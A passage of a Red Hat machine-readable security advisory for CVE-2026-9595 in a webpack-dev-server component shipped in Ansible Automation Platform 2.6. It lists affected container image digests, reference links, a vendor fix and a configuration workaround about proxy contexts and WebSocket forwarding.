"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-9595"
},
{
"category": "external",
"summary": "RHBZ#2488934",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488934"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-9595",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9595"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-9595",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9595"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/facebook/create-react-app/pull/7444",
"url": "https://github.com/facebook/create-react-app/pull/7444"
},
{
"category": "external",
"summary": "https://github.com/vuejs/vue-cli/commit/72ba7505aff2a8314e82aa5082379a77504a1fcb",
"url": "https://github.com/vuejs/vue-cli/commit/72ba7505aff2a8314e82aa5082379a77504a1fcb"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack-dev-server/pull/4316",
"url": "https://github.com/webpack/webpack-dev-server/pull/4316"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-mx8g-39q3-5c79",
"url": "https://github.com/webpack/webpack-dev-server/security/advisories/GHSA-mx8g-39q3-5c79"
}
],
"release_date": "2026-06-15T15:00:21.488000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "To mitigate this issue, users should avoid configuring `webpack-dev-server` with a broad proxy context (e.g., `/`) when WebSocket forwarding (`ws: true`) is enabled. Instead, define specific paths for the proxy context. Alternatively, disable WebSocket forwarding by omitting `ws: true` from the proxy entry if WebSocket functionality is not required for the proxy target. This configuration change may require restarting the `webpack-dev-server` instance to take effect.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
